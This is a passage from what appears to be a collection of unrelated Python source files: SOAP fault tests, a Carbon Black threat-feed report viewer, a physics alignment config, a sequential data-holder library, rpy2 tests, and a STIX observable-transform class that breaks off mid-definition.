self.assertEqual(len(fault.error_list), 1)
self.assertEqual(fault.error_list[0]['codeContext'], 'urn:nhs:names:error:tms')
self.assertEqual(fault.error_list[0]['errorCode'], '200')
self.assertEqual(fault.error_list[0]['severity'], 'Error')
self.assertEqual(fault.error_list[0]['location'], 'Not Supported')
self.assertEqual(fault.error_list[0]['description'], 'System failure to process message - default')
def test_from_string_multiple(self):
message = file_utilities.get_file_string(Path(self.message_dir) / 'soapfault_response_multiple_errors.xml')
fault: SOAPFault = SOAPFault.from_string({}, message)
self.assertEqual(fault.fault_code, 'SOAP:Server')
self.assertEqual(fault.fault_string, 'Application Exception')
self.assertEqual(len(fault.error_list), 2)
self.assertEqual(fault.error_list[0]['codeContext'], 'urn:nhs:names:error:tms')
self.assertEqual(fault.error_list[0]['errorCode'], '200')
self.assertEqual(fault.error_list[0]['severity'], 'Error')
self.assertEqual(fault.error_list[0]['location'], 'Not Supported')
self.assertEqual(fault.error_list[0]['description'], 'System failure to process message - default')
self.assertEqual(fault.error_list[1]['codeContext'], 'urn:nhs:names:error:tms')
self.assertEqual(fault.error_list[1]['errorCode'], '201')
self.assertEqual(fault.error_list[1]['severity'], 'Error')
self.assertEqual(fault.error_list[1]['location'], 'Not Supported')
self.assertEqual(fault.error_list[1]['description'], 'The message is not well formed')
def test_soap_error_codes_are_retriable_or_not(self):
errors_and_expected = [("a retriable failure to process message error code 200", [200], True),
("a retriable routing failure error code 206", [206], True),
("a retriable failure storing memo error code 208", [208], True),
("a NON retriable error code 300", [300], False),
("a NON retriable set of error codes 300, 207", [300, 207], False),
("a mix of retriable and NON retriable error codes 300, 206", [300, 206], False),
("a mix of retriable and NON retriable error codes 206, 300", [206, 300], False),
("a set of retriable error codes 208, 206", [208, 206], True)
]
for description, error, expected_result in errors_and_expected:
with self.subTest(description):
result = SOAPFault.is_soap_fault_retriable(error)
self.assertEqual(result, expected_result)
|
412137
|
import sys
import time
import struct
import socket
import pprint
import optparse
# in the github repo, cbapi is not in the example directory
sys.path.append('../src/cbapi')
import cbapi
def build_cli_parser():
parser = optparse.OptionParser(usage="%prog [options]", description="Display information about a particular feed report")
# for each supported output type, add an option
#
parser.add_option("-c", "--cburl", action="store", default=None, dest="server_url",
help="CB server's URL. e.g., http://127.0.0.1 ")
parser.add_option("-a", "--apitoken", action="store", default=None, dest="token",
help="API Token for Carbon Black server")
parser.add_option("-n", "--no-ssl-verify", action="store_false", default=True, dest="ssl_verify",
help="Do not verify server SSL certificate.")
parser.add_option("-i", "--id", action="store", default=None, dest="feedid",
help="Id of feed of which the specified report is a part of")
parser.add_option("-r", "--reportid", action="store", default=None, dest="reportid",
help="Id of report to query; this may be alphanumeric")
return parser
def get_ioc_counts(iocs):
"""
returns counts of md5s, ipv4s, domains, and queries as a tuple given a feed report ioc block
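for example (illustrative values only):
get_ioc_counts({'md5': ['d41d8cd9'], 'dns': ['example.com']}) -> (1, 0, 1, 0)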
"""
return len(iocs.get('md5', [])), \
len(iocs.get('ipv4', [])), \
len(iocs.get('dns', [])), \
len(iocs.get('query', []))
def main(argv):
parser = build_cli_parser()
opts, args = parser.parse_args(argv)
if not opts.server_url or not opts.token or not opts.feedid or not opts.reportid:
print "Missing required param; run with --help for usage"
sys.exit(-1)
# build a cbapi object
#
cb = cbapi.CbApi(opts.server_url, token=opts.token, ssl_verify=opts.ssl_verify)
# retrieve threat report
#
report = cb.feed_report_info(opts.feedid, opts.reportid)
# get ioc counts
#
count_md5s, count_ipv4s, count_domains, count_queries = get_ioc_counts(report.get('iocs', {}))
# output the threat report details
#
print report["title"]
print "-" * 80
print
print " Report Summary"
print " %s" % ("-" * 78)
print " %-20s : %s" % ("Score", report["score"])
print " %-20s : %s" % ("Report Id", report["id"])
print " %-20s : %s" % ("Link", report["link"])
print " %-20s : %s" % ("Report Timestamp", time.strftime('%Y-%m-%d %H:%M:%S GMT', time.localtime(report["timestamp"])))
print " %-20s : %s" % ("Total IOC count", count_md5s + count_ipv4s + count_domains + count_queries)
print
print " Feed Details"
print " %s" % ("-" * 78)
print " %-20s : %s" % ("Feed Name", report["feed_name"])
print " %-20s : %s" % ("Feed Id", report["feed_id"])
print
print " Report IOCs"
print " %s" % ("-" * 78)
print
if count_md5s > 0:
print " MD5"
print " %s" % ("-" * 76)
for md5 in report["iocs"]["md5"]:
print " %s" % md5
print
if count_ipv4s > 0:
print " IPv4"
print " %s" % ("-" * 76)
for ipv4 in report["iocs"]["ipv4"]:
print " %s" % ipv4
print
if count_domains > 0:
print " Domain"
print " %s" % ("-" * 76)
for domain in report["iocs"]["dns"]:
print " %s" % domain
print
if count_queries > 0:
print " Query"
print " %s" % ("-" * 76)
print " %-18s : %s" % ("Query", report["iocs"]["query"][0]["search_query"])
print " %-18s : %s" % ("Index Type", report["iocs"]["query"][0]["index_type"])
print
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
|
412143
|
import FWCore.ParameterSet.Config as cms
from Alignment.APEEstimation.ApeEstimator_cfi import *
from Alignment.APEEstimation.SectorBuilder_cff import *
ApeEstimator = ApeEstimatorTemplate.clone(
maxTracksPerEvent = 0,
#applyTrackCuts = False,
minGoodHitsPerTrack = 1,
residualErrorBinning = [0.0005,0.0010,0.0015,0.0020,0.0025,0.0030,0.0035,0.0040,0.0050,0.0070,0.0100], # 5-100um
#zoomHists = False,
vErrHists = [1],
#Sectors = SubdetSectors,
#Sectors = TIBTOBQuarters,
#Sectors = TIBTOBQuarters2DSeparation,
#Sectors = TIBTOBPitchAnd2DSeparation,
#Sectors = TIBTOBLayerAndOrientationSeparation,
#Sectors = TIDTECSideAndRingAndOrientationSeparation,
Sectors = RecentSectors,
tjTkAssociationMapTag = "TrackRefitterHighPurityForApeEstimator",
)
ApeEstimator.HitSelector.width = [3,3]
ApeEstimator.HitSelector.maxIndex = [1,1]
#ApeEstimator.HitSelector.edgeStrips = [2,800] # exclude first (and so also last) strip
ApeEstimator.HitSelector.sOverN = [20.,50.]
ApeEstimator.HitSelector.chargePixel = [10000., 2000000.]
ApeEstimator.HitSelector.widthX = [2,1000]
ApeEstimator.HitSelector.widthY = [2,1000]
ApeEstimator.HitSelector.logClusterProbability = [-5.,1.]
ApeEstimator.HitSelector.isOnEdge = [0,0]
ApeEstimator.HitSelector.qBin = [1,3]
# Why is charge and maxCharge double, not int?
#ApeEstimator.HitSelector.maxCharge = [0.,250.]
ApeEstimator.HitSelector.chargeOnEdges = [0.,0.5]
#ApeEstimator.HitSelector.phiSensX = [-1.0472,1.0472] # [-60,60] degree
#ApeEstimator.HitSelector.phiSensY = [-1.0472,1.0472] # [-60,60] degree
#ApeEstimator.HitSelector.errXHit = cms.vdouble(0.,0.0060) # 60um, to exclude very large clusters
ApeAnalyzer = ApeEstimator.clone(
Sectors = ValidationSectors,
analyzerMode = True,
calculateApe = True,
)
|
412150
|
from cogitare.data.dataholder import AbsDataHolder
from six import add_metaclass
from six.moves import zip_longest
from abc import ABCMeta
import torch
import numpy
@add_metaclass(ABCMeta)
class SequentialAbsDataHolder(AbsDataHolder):
"""
This class is an extension of :class:`~cogitare.data.AbsDataHolder` to support
sequential data, iterating over the batches and over timesteps. It's the recommended
interface for use with :class:`~cogitare.SequentialModel`.
An abstract object that acts as a data holder. A data holder is a utility to hold
datasets, and provides some simple functions to work with the dataset, such as
sorting, splitting, dividing it into chunks, loading batches using multiple threads, and so on.
It's the recommended way to pass data to Cogitare's models because it already
provides a compatible interface to iterate over batches and timesteps.
To improve performance, the data holder loads batches using a multiprocessing and multithreading
data loader built on `Dask <http://dask.pydata.org/>`_.
Usually, this object should not be used directly, only if you are developing a custom
data loader. Cogitare already provides the following implementations for the most
common data types:
- Sequence from Tensors: :class:`~cogitare.data.SequentialTensorHolder`
- Sequence from Numpy: :class:`~cogitare.data.SequentialNumpyHolder`
- Sequence from Callable (functions that receive the sample id, and returns its
data): :class:`~cogitare.data.SequentialCallableHolder`
- :class:`~cogitare.data.SequentialAutoHolder`: inspect the data to choose one of the available data holders.
Args:
data (torch.Tensor, numpy.ndarray, callable): the data to be managed by the data holder.
batch_size (int): the size of the batch.
shuffle (bool): if True, shuffles the dataset after each iteration.
drop_last (bool): if True, then skip the batch if its size is lower than **batch_size** (can
occur in the last batch).
total_samples (int): the number of total samples. If provided, this will limit the
number of samples to be accessed in the data.
mode (str): must be one of: 'sequential', 'threaded', 'multiprocessing'. Use one of them
to choose the batch loading method. Take a look
here: https://dask.pydata.org/en/latest/scheduler-choice.html for an overview
of the advantage of each mode.
padding_value: this value will be used to pad sequences with different
sizes in the same batch. When loading a batch, all sequences will have
the same size. The padding_value is added to the right of each sequence to match the size
of the longest sequence in the batch.
sort_by_len (bool): if True, the sequences in the batch will be sorted by decreasing size. This is
useful to load data for torch rnn.PackedSequence. If True, the iterator will return a
tuple with (data, original indices, sizes).
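Example (an illustrative sketch using the :class:`~cogitare.data.SequentialTensorHolder` subclass; the tensor values are arbitrary)::
>>> tensor = torch.Tensor([[1, 2, 3], [4, 5, 6]])
>>> data = SequentialTensorHolder(tensor, batch_size=2, sort_by_len=True)
>>> batch, indices, lengths = next(data)
>>> # batch: list of per-timestep tuples (samples sorted by decreasing length)
>>> # indices: original positions of the sorted samples
>>> # lengths: sequence lengths in decreasing order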
"""
@property
def padding_value(self):
"""The value used to pad sequences with different size in the same batch
"""
return self._padding_value
@padding_value.setter
def padding_value(self, value):
self._padding_value = value
def __init__(self, *args, **kwargs):
self._padding_value = kwargs.pop('padding_value', None)
self._sort_by_len = kwargs.pop('sort_by_len', False)
super(SequentialAbsDataHolder, self).__init__(*args, **kwargs)
def __iter__(self):
return self
def __next__(self):
batch = super(SequentialAbsDataHolder, self).__next__()
if self._sort_by_len:
lengths = [len(v) for v in batch]
indices = [v[0] for v in sorted(enumerate(lengths), reverse=True, key=lambda x: x[1])]
sorted_batch = [batch[i] for i in indices]
sorted_lengths = [lengths[i] for i in indices]
data = zip_longest(*sorted_batch, fillvalue=self.padding_value)
return list(data), indices, sorted_lengths
else:
data = zip_longest(*batch, fillvalue=self.padding_value)
return list(data)
next = __next__
class SequentialCallableHolder(SequentialAbsDataHolder):
"""SequentialCallableHolder is a data holder for abritary data type.
As data input, it uses a callable that receive the sample index as parameter,
and must return the sample (an interator with all the timesteps for the sample).
It can be used to load non-Tensor or non-numpy datasets, such as texts, dicts, and anything else.
You are free to use SequentialCallableHolder with any data type. As a requirement for sequential models,
the returned value must be an iterator containing the timesteps, and have the length attribute.
.. note:: When using SequentialCallableHolder, you must specify the number of samples
in the dataset. The callable will be called asking for samples from 0 to (total_samples - 1).
Example::
>>> def load_sample(idx):
... # the idx'th sample with 3 features per timestep, and #idx timesteps
... return [(i, i, i) for i in range(idx)]
>>> # when using the SequentialCallableHolder. you must pass the number of samples to
>>> # be loaded.
>>> # you can set the total_samples using the parameter in the constructor
>>> data = SequentialCallableHolder(load_sample, batch_size=2, total_samples=5)
>>> # or by setting the property
>>> data.total_samples = 5
>>> batch = next(data)
>>> batch
[((0, 0, 0), (0, 0, 0)), (None, (1, 1, 1)), (None, (2, 2, 2)), (None, (3, 3, 3))]
>>> for timestep, data in enumerate(batch, 1):
... print('Current timestep: ' + str(timestep))
... print(data)
Current timestep: 1
((0, 0, 0), (0, 0, 0))
Current timestep: 2
(None, (1, 1, 1))
Current timestep: 3
(None, (2, 2, 2))
Current timestep: 4
(None, (3, 3, 3))
>>> # in the example above, the first sequence had length 1, and the second
>>> # length 4. The first one was padded with None.
>>> # to pad with a different value, use:
>>> data = SequentialCallableHolder(load_sample, batch_size=2,
... total_samples=5, padding_value=-1)
>>> batch = next(data)
>>> batch
[((0, 0, 0), (0, 0, 0)), ((1, 1, 1), (1, 1, 1)), ((2, 2, 2), -1), ((3, 3, 3), -1)]
>>> for timestep, data in enumerate(batch, 1):
... print('Current timestep: ' + str(timestep))
... print(data)
Current timestep: 1
((0, 0, 0), (0, 0, 0))
Current timestep: 2
((1, 1, 1), (1, 1, 1))
Current timestep: 3
((2, 2, 2), -1)
Current timestep: 4
((3, 3, 3), -1)
"""
def get_sample(self, key):
return self._data(key)
class SequentialTensorHolder(SequentialAbsDataHolder):
"""A data holder for sequences in :class:`torch.Tensor`.
The tensor must have the shape (N, S, \*), where:
- N is batch size (number of samples in the tensor);
- S is the sequence length
The :class:`~cogitare.data.SequentialTensorHolder` will first iterate over the batches,
getting ``batch_size`` samples from the first dimension. And the will iterate over the second
dimension of the mini-batch.
Example::
>>> tensor = torch.Tensor([[1,2,3], [4,5,6], [7,8,9]])
>>> tensor
1 2 3
4 5 6
7 8 9
[torch.FloatTensor of size 3x3]
>>> data = SequentialTensorHolder(tensor, batch_size=2)
>>> batch = next(data)
>>> batch
[(1.0, 7.0), (2.0, 8.0), (3.0, 9.0)]
>>> for timestep, data in enumerate(batch, 1):
... print('Current timestep: ' + str(timestep))
... print(data)
Current timestep: 1
(1.0, 7.0)
Current timestep: 2
(2.0, 8.0)
Current timestep: 3
(3.0, 9.0)
"""
def __init__(self, *args, **kwargs):
super(SequentialTensorHolder, self).__init__(*args, **kwargs)
self._total_samples = len(self._data)
def get_sample(self, key):
return self._data[key]
def SequentialNumpyHolder(data, *args, **kwargs):
"""
When creating the object, it converts the numpy data to Tensor using
:func:`torch.from_numpy` and then creates an :class:`~cogitare.data.SequentialTensorHolder`
instance.
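Example (illustrative)::
>>> arr = numpy.array([[1, 2, 3], [4, 5, 6]])
>>> data = SequentialNumpyHolder(arr, batch_size=2)
>>> batch = next(data)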
"""
data = torch.from_numpy(data)
return SequentialTensorHolder(data=data, *args, **kwargs)
def SequentialAutoHolder(data, *args, **kwargs):
"""Check the data type to infer which sequential data holder to use.
"""
if isinstance(data, numpy.ndarray):
return SequentialNumpyHolder(data, *args, **kwargs)
if torch.is_tensor(data):
return SequentialTensorHolder(data, *args, **kwargs)
if callable(data):
return SequentialCallableHolder(data, *args, **kwargs)
raise ValueError('Unable to infer data type!')
|
412173
|
import unittest
import copy
import gc
from rpy2 import rinterface
rinterface.initr()
class SexpTestCase(unittest.TestCase):
def testNew_invalid(self):
x = "a"
self.assertRaises(ValueError, rinterface.Sexp, x)
def testNew(self):
sexp = rinterface.baseenv.get("letters")
sexp_new = rinterface.Sexp(sexp)
idem = rinterface.baseenv.get("identical")
self.assertTrue(idem(sexp, sexp_new)[0])
sexp_new2 = rinterface.Sexp(sexp)
self.assertTrue(idem(sexp, sexp_new2)[0])
del(sexp)
self.assertTrue(idem(sexp_new, sexp_new2)[0])
def testTypeof_get(self):
sexp = rinterface.baseenv.get("letters")
self.assertEqual(sexp.typeof, rinterface.STRSXP)
sexp = rinterface.baseenv.get("pi")
self.assertEqual(sexp.typeof, rinterface.REALSXP)
sexp = rinterface.baseenv.get("plot")
self.assertEqual(sexp.typeof, rinterface.CLOSXP)
def testList_attrs(self):
x = rinterface.IntSexpVector((1,2,3))
self.assertEqual(0, len(x.list_attrs()))
x.do_slot_assign('a', rinterface.IntSexpVector((33,)))
self.assertEqual(1, len(x.list_attrs()))
self.assertTrue('a' in x.list_attrs())
def testDo_slot(self):
data_func = rinterface.baseenv.get("data")
data_func(rinterface.SexpVector(["iris", ], rinterface.STRSXP))
sexp = rinterface.globalenv.get("iris")
names = sexp.do_slot("names")
iris_names = ("Sepal.Length", "Sepal.Width", "Petal.Length", "Petal.Width", "Species")
self.assertEqual(len(iris_names), len(names))
for i, n in enumerate(iris_names):
self.assertEqual(iris_names[i], names[i])
self.assertRaises(LookupError, sexp.do_slot, "foo")
def testDo_slot_emptyString(self):
sexp = rinterface.baseenv.get('pi')
self.assertRaises(ValueError, sexp.do_slot, "")
def testDo_slot_assign(self):
data_func = rinterface.baseenv.get("data")
data_func(rinterface.SexpVector(["iris", ], rinterface.STRSXP))
sexp = rinterface.globalenv.get("iris")
iris_names = rinterface.StrSexpVector(['a', 'b', 'c', 'd', 'e'])
sexp.do_slot_assign("names", iris_names)
names = [x for x in sexp.do_slot("names")]
self.assertEqual(['a', 'b', 'c', 'd', 'e'], names)
def testDo_slot_assign_create(self):
#test that assigning slots is also creating the slot
x = rinterface.IntSexpVector([1,2,3])
x.do_slot_assign("foo", rinterface.StrSexpVector(["bar", ]))
slot = x.do_slot("foo")
self.assertEqual(1, len(slot))
self.assertEqual("bar", slot[0])
def testDo_slot_assign_emptyString(self):
#test that assigning a slot with an empty name raises ValueError
x = rinterface.IntSexpVector([1,2,3])
self.assertRaises(ValueError,
x.do_slot_assign, "",
rinterface.StrSexpVector(["bar", ]))
def testSexp_rsame_true(self):
sexp_a = rinterface.baseenv.get("letters")
sexp_b = rinterface.baseenv.get("letters")
self.assertTrue(sexp_a.rsame(sexp_b))
def testSexp_rsame_false(self):
sexp_a = rinterface.baseenv.get("letters")
sexp_b = rinterface.baseenv.get("pi")
self.assertFalse(sexp_a.rsame(sexp_b))
def testSexp_rsame_wrongType(self):
sexp_a = rinterface.baseenv.get("letters")
self.assertRaises(ValueError, sexp_a.rsame, 'foo')
def testSexp_sexp(self):
sexp = rinterface.IntSexpVector([1,2,3])
sexp_count = sexp.__sexp_refcount__
sexp_cobj = sexp.__sexp__
d = dict(rinterface._rinterface.protected_rids())
self.assertEqual(sexp_count, d[sexp.rid])
self.assertEqual(sexp_count, sexp.__sexp_refcount__)
sexp2 = rinterface.IntSexpVector([4,5,6,7])
sexp2_rid = sexp2.rid
sexp2.__sexp__ = sexp_cobj
del(sexp)
gc.collect()
d = dict(rinterface._rinterface.protected_rids())
self.assertEqual(None, d.get(sexp2_rid))
def testSexp_rclass_get(self):
sexp = rinterface.baseenv.get("letters")
self.assertEqual(len(sexp.rclass), 1)
self.assertEqual(sexp.rclass[0], "character")
sexp = rinterface.baseenv.get("matrix")(0)
self.assertEqual(len(sexp.rclass), 1)
self.assertEqual(sexp.rclass[0], "matrix")
def testSexp_rclass_set(self):
sexp = rinterface.IntSexpVector([1,2,3])
sexp.rclass = rinterface.StrSexpVector(['foo'])
self.assertEqual(len(sexp.rclass), 1)
self.assertEqual(sexp.rclass[0], "foo")
def testSexp_sexp_wrongtypeof(self):
sexp = rinterface.IntSexpVector([1,2,3])
cobj = sexp.__sexp__
sexp = rinterface.StrSexpVector(['a', 'b'])
self.assertEqual(2, len(sexp))
self.assertRaises(ValueError, sexp.__setattr__, '__sexp__', cobj)
def testSexp_sexp_UniqueCapsule(self):
sexp = rinterface.IntSexpVector([1,2,3])
sexp_count = sexp.__sexp_refcount__
cobj = sexp.__sexp__
# check that no increase in the refcount: the capsule is unique
self.assertEqual(sexp_count, sexp.__sexp_refcount__)
self.assertEqual(sexp_count,
dict(rinterface.protected_rids())[sexp.rid])
del(cobj)
gc.collect()
self.assertEqual(sexp_count, sexp.__sexp_refcount__)
self.assertEqual(sexp_count,
dict(rinterface.protected_rids())[sexp.rid])
sexp_rid = sexp.rid
del(sexp)
gc.collect()
self.assertFalse(sexp_rid in dict(rinterface.protected_rids()))
def testSexp_sexp_set(self):
x = rinterface.IntSexpVector([1,2,3])
x_s = x.__sexp__
x_rid = x.rid
# The Python reference count of the capsule is incremented,
# not the rpy2 reference count
self.assertEqual(1, x.__sexp_refcount__)
y = rinterface.IntSexpVector([4,5,6])
y_count = y.__sexp_refcount__
y_rid = y.rid
self.assertEqual(1, y_count)
self.assertTrue(x_rid in [elt[0] for elt in rinterface.protected_rids()])
x.__sexp__ = y.__sexp__
self.assertFalse(x_rid in [elt[0] for elt in rinterface.protected_rids()])
self.assertEqual(x.rid, y.rid)
self.assertEqual(y_rid, y.rid)
# now both x and y point to the same capsule, making
# the rpy2 reference count to 2
self.assertEqual(x.__sexp_refcount__, y.__sexp_refcount__)
self.assertEqual(y_count+1, x.__sexp_refcount__)
del(x)
self.assertTrue(y_rid in [elt[0] for elt in rinterface.protected_rids()])
del(y)
self.assertFalse(y_rid in [elt[0] for elt in rinterface.protected_rids()])
def testSexp_deepcopy(self):
sexp = rinterface.IntSexpVector([1,2,3])
self.assertEqual(0, sexp.named)
rinterface.baseenv.get("identity")(sexp)
self.assertEqual(2, sexp.named)
sexp2 = sexp.__deepcopy__()
self.assertEqual(sexp.typeof, sexp2.typeof)
self.assertEqual(list(sexp), list(sexp2))
self.assertFalse(sexp.rsame(sexp2))
self.assertEqual(0, sexp2.named)
# should be the same as above, but just in case:
sexp3 = copy.deepcopy(sexp)
self.assertEqual(sexp.typeof, sexp3.typeof)
self.assertEqual(list(sexp), list(sexp3))
self.assertFalse(sexp.rsame(sexp3))
self.assertEqual(0, sexp3.named)
def testRID(self):
globalenv_id = rinterface.baseenv.get('.GlobalEnv').rid
self.assertEqual(globalenv_id, rinterface.globalenv.rid)
class RNULLTestCase(unittest.TestCase):
def testRNULLType_nonzero(self):
NULL = rinterface.RNULLType()
self.assertFalse(NULL)
def suite():
suite = unittest.TestLoader().loadTestsFromTestCase(SexpTestCase)
suite.addTest(unittest.TestLoader().loadTestsFromTestCase(RNULLTestCase))
return suite
if __name__ == '__main__':
tr = unittest.TextTestRunner(verbosity = 2)
tr.run(suite())
|
412185
|
import logging
import pprint
import copy
import types
import six
from mixbox.entities import EntityList
from cybox.core import Object
from cybox.common import ObjectProperties
from stix.core import STIXPackage
import certau.util.stix.helpers as stix_helpers
class StixTransform(object):
"""Base class for transforming a STIX package to an alternate format.
This class provides helper functions for processing
:py:class:`STIXPackage<stix.core.stix_package.STIXPackage>` elements.
This class should be extended by other classes that
transform STIX packages into alternate formats.
The default constructor processes a STIX package to initialise
self.observables, a :py:class:`dict` keyed by object type.
Each entry contains a :py:class:`list` of :py:class:`dict` objects
with three keys: 'id', 'observable', and 'fields', containing the
observable ID, the :py:class:`Observable<cybox.core.observable.Observable>`
object itself, and extracted fields, respectively.
Args:
package: the STIX package to transform
Attributes:
OBJECT_FIELDS: a :py:class:`dict` of supported Cybox object types
and fields ('properties'). The dictionary is keyed by Cybox object
type string (see :py:func:`_observable_object_type`) with each
entry containing a list of field names from that object that will
be utilised during the transformation.
Field names may reference sub-objects using dot notation.
For example the Cybox EmailMessage class contains a `header` field
referring to an EmailHeader object which contains a `to` field.
This field can be referenced using the notation `header.to`.
If OBJECT_FIELDS evaluates to False (e.g. empty dict()), it is
assumed all object types are supported.
OBJECT_CONSTRAINTS: a :py:class:`dict` of constraints on the
supported object types based on 'categories' associated with that
type. For example, the Cybox Address object uses the field
`category` to distinguish between IPv4, IPv6 and even email
addresses. Like OBJECT_FIELDS, the dictionary is keyed by object
type. Each entry contains a dictionary keyed by field name,
containing a list of values, or categories, (for that field name)
that are supported by the transform.
Note. Does not support the expression of more complex constraints,
for example combining different categories.
STRING_CONDITION_CONSTRAINT: a :py:class:`list` of string condition
values supported by the transform. For example, some transforms
may not support 'FitsPattern' or 'StartsWith' string condition
values. Use this to list the supported values. Note the values
are strings, even 'None'.
"""
# Class constants - see descriptions above
OBJECT_FIELDS = dict()
OBJECT_CONSTRAINTS = dict()
STRING_CONDITION_CONSTRAINT = list()
def __init__(self, package, default_title=None, default_description=None,
default_tlp='AMBER'):
self.package = package
self.observables = self._observables_for_package(package)
self.default_title = default_title
self.default_description = default_description
self.default_tlp = default_tlp
# Initialise the logger
self._logger = logging.getLogger()
self._logger.debug('%s object created', self.__class__.__name__)
# ##### Properties
@property
def package(self):
return self._package
@package.setter
def package(self, package):
if not isinstance(package, STIXPackage):
raise TypeError('expected STIXPackage object')
self._package = package
@property
def default_title(self):
return self._default_title
@default_title.setter
def default_title(self, title):
self._default_title = '' if title is None else str(title)
@property
def default_description(self):
return self._default_description
@default_description.setter
def default_description(self, description):
if description is None:
self._default_description = ''
else:
self._default_description = str(description)
@property
def default_tlp(self):
return self._default_tlp
@default_tlp.setter
def default_tlp(self, tlp):
if str(tlp) not in stix_helpers.TLP_COLOURS:
raise TypeError('invalid TLP colour')
self._default_tlp = str(tlp)
@property
def observables(self):
return self._observables
@observables.setter
def observables(self, observables):
self._observables = observables
# ##### Helpers for extracting various STIX package elements. #####
def package_title(self):
"""Retrieves the STIX package title (str) from the header."""
title = stix_helpers.package_title(self.package)
return title or self.default_title
def package_description(self):
"""Retrieves the STIX package description (str) from the header."""
description = stix_helpers.package_description(self.package)
return description or self.default_description
def package_tlp(self):
"""Retrieves the STIX package TLP (str) from the header."""
tlp = stix_helpers.package_tlp(self.package)
return tlp or self.default_tlp
# ### Internal methods for processing observables, objects and properties.
@staticmethod
def _observable_properties(observable):
"""Retrieves an observable's object's properties.
Args:
observable: a :py:class:`cybox.Observable` object
Returns:
:py:class:`cybox.ObjectProperties`: the properties from the
observable's object (if they exist), otherwise None.
"""
if (isinstance(observable.object_, Object) and
isinstance(observable.object_.properties, ObjectProperties)):
return observable.object_.properties
else:
return None
@staticmethod
def _observable_object_type(observable):
"""Determine the object type of an observable's object.
Observable object's properties are Cybox object types which extend
the ObjectProperties class. The class name for these objects is
used to represent the object type.
Args:
observable: a :py:class:`cybox.Observable` object
Returns:
str: a string representation of the observable's object properties
type, or None if observable contains no properties.
"""
properties = StixTransform._observable_properties(observable)
return properties.__class__.__name__ if properties else None
@staticmethod
def _condition_key_for_field(field):
"""Dictionary key used for storing the string condition of a field."""
return field + '_condition'
@classmethod
def _observables_for_package(cls, package):
"""Extract observables from a STIX package.
Collects observables from a STIX package and groups them by object
type. Only observables with an ID and containing a Cybox object are
returned. Results are returned in a dictionary keyed by object
type - see :py:func:`_observable_object_type`.
If OBJECT_FIELDS are specified only observables containing the
object types listed will be returned, and only those with at
least one of the listed fields containing a non-trivial value.
OBJECT_CONSTRAINTS and STRING_CONDITION_CONSTRAINT are also applied.
If no OBJECT_FIELDS are specified no constraints are applied and all
identified observables are returned.
Observables are sought from the following locations:
- the root of the STIX package
- within Indicator objects (where the indicators are in the package
root)
- within ObservableComposition objects found in either of the two
previous locations
Args:
package: a :py:class:`stix:STIXPackage` object
Returns:
dict: a dictionary of valid observables, keyed by object type
(See description above). May be empty.
"""
def _add_observables(new_observables):
for observable in new_observables:
if observable.observable_composition is not None:
_add_observables(
observable.observable_composition.observables
)
else:
object_type = cls._observable_object_type(observable)
if (observable.id_ is not None and
observable.id_ not in observable_ids and
object_type is not None):
object_type = cls._observable_object_type(observable)
if object_type in cls.OBJECT_FIELDS.keys():
fields = cls._field_values_for_observable(
observable
)
if not fields:
continue
elif not cls.OBJECT_FIELDS:
fields = None
else:
continue
if object_type not in observables:
observables[object_type] = []
new_observable = dict(
id=observable.id_,
observable=observable,
fields=fields,
)
observables[object_type].append(new_observable)
observable_ids.append(observable.id_)
# Look for observables in the package root and in indicators
observable_ids = []
observables = dict()
if package.observables:
_add_observables(package.observables)
if package.indicators:
for i in package.indicators:
if i.observables:
_add_observables(i.observables)
return observables
@classmethod
def _field_values_for_observable(cls, observable):
"""Collects property field values for an observable."""
object_type = cls._observable_object_type(observable)
fields = list(cls.OBJECT_FIELDS[object_type])
# Add any fields required for constraint checking
if object_type in cls.OBJECT_CONSTRAINTS.keys():
for field in cls.OBJECT_CONSTRAINTS[object_type]:
if field not in fields:
fields.append(field)
# Get field values
values = []
properties = cls._observable_properties(observable)
cls._field_values_for_entity(values, properties, fields)
# Check constraints
if object_type in cls.OBJECT_CONSTRAINTS.keys():
for field in cls.OBJECT_CONSTRAINTS[object_type]:
for value in values:
# Multiple constraints are combined with an implied 'AND'
# (i.e. all of the constraints must be satisfied)
if (field not in value or value[field] not in
cls.OBJECT_CONSTRAINTS[object_type][field]):
values.remove(value)
break
# Remove the constraint field if not needed
if field not in cls.OBJECT_FIELDS[object_type]:
del value[field]
return values
@classmethod
def _field_values_for_entity(cls, values, entity, fields, first_part=''):
"""Returns requested field values from a cybox.Entity object."""
def _first_parts(fields):
"""Get the bits on the left of the first dot in the field names.
"""
first_parts = set()
for field in fields:
parts = field.split('.')
first_parts.add(parts[0])
return first_parts
def _next_parts(fields, field):
"""Get the next parts for this field."""
next_parts = set()
first_part = field + '.'
for field in fields:
if field.startswith(first_part):
next_parts.add(field[len(first_part):])
return next_parts
def _convert_to_str(value):
if six.PY2:
if isinstance(value, basestring):
return value.encode('utf-8')
else:
return pprint.pformat(value)
else:
return str(value)
def _get_value_condition(value):
"""Set the condition value to '-' if the field doesn't have a
condition attribute to allow us to differentiate it from a value
that does contain a condition attribute, but its value is None.
"""
condition = getattr(value, 'condition', '-')
value = getattr(value, 'value', value)
return (_convert_to_str(value), _convert_to_str(condition))
def _add_value_to_dict(dict_, value, field):
value, condition = _get_value_condition(value)
if value and (not cls.STRING_CONDITION_CONSTRAINT or
condition in cls.STRING_CONDITION_CONSTRAINT or
condition == '-'):
dict_[field] = value
if condition != '-':
c_field = cls._condition_key_for_field(field)
dict_[c_field] = condition
def _add_value_to_values(values, value, field):
"""Add value and condition (if present) to results."""
if values:
for dict_ in values:
_add_value_to_dict(dict_, value, field)
else:
# First entry
dict_ = dict()
_add_value_to_dict(dict_, value, field)
if dict_:
values.append(dict_)
for field in _first_parts(fields):
full_first_part = first_part + '.' + field if first_part else field
next_parts = _next_parts(fields, field)
value = getattr(entity, field, None)
# Test if value is not a string and iterable
iterable = False
if not isinstance(value, six.string_types):
try:
iter(value)
iterable = True
except TypeError:
pass
if iterable:
values_copy = copy.deepcopy(values)
first = True
for item in value:
v_list = values if first else copy.deepcopy(values_copy)
if next_parts:
cls._field_values_for_entity(v_list, item, next_parts,
full_first_part)
else:
_add_value_to_values(v_list, item, full_first_part)
if not first:
values.extend(v_list)
else:
first = False
elif value:
if next_parts:
cls._field_values_for_entity(values, value, next_parts,
full_first_part)
else:
_add_value_to_values(values, value, full_first_part)
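# Illustrative sketch (not part of the original module): a hypothetical
# subclass showing how the class constants described in the docstring are
# meant to be filled in. The object types, field names and category values
# below are examples only.
class ExampleAddressTransform(StixTransform):
    # Only Address and EmailMessage observables are of interest; note the
    # dot notation ('header.to') used to reach into sub-objects.
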